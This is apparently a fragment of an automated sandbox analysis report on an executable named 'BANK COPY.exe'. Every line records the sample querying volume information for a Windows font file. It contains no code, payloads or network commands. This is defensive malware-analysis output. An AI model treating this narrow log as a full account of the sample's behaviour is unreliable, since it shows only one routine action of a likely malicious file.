                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\BANK COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
